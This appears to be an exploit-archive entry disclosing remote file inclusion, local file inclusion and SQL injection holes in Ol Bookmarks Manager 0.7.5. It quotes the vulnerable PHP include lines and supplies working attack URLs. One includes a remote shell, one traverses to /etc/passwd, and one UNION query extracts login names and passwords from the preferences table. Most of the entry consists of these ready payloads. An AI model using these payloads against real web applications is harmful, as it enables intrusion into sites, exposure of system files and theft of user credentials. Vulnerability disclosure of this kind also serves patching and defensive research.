id: 3739
date: 09/23/2008
title: Ol Bookmarks Manager 0.7.5 RFI / LFI / SQL Injection Vulnerabilities
author: GoLd_M
cves: 

====================================================================
Ol Bookmarks Manager 0.7.5 RFI / LFI / SQL Injection Vulnerabilities
====================================================================


#########################################
Ol Bookmarks Manager 0.7.5 RFI / LFI / SQL Injection Vulnerabilities
#########################################
POC & Vulns
RFI In (frame.php) In Line 46
	include "$_GET[framefile]";
#########################################
Ex : /frame.php?framefile=[Shell]
#########################################
LFI In (/read/frame.php) In Line 46
	include "../$_GET[framefile]";
#########################################
Ex : /frame.php?framefile=../../../../../../etc/passwd
#########################################
SQL Injection In /read/index.php?name=brian&id=
Ex : /read/index.php?name=brian&id=-0000008+union+select+1,2,3,4,password,login,7,8,9,10,12,11,13+from+preferences--
#########################################



#  0day.today [2023-03-27]  #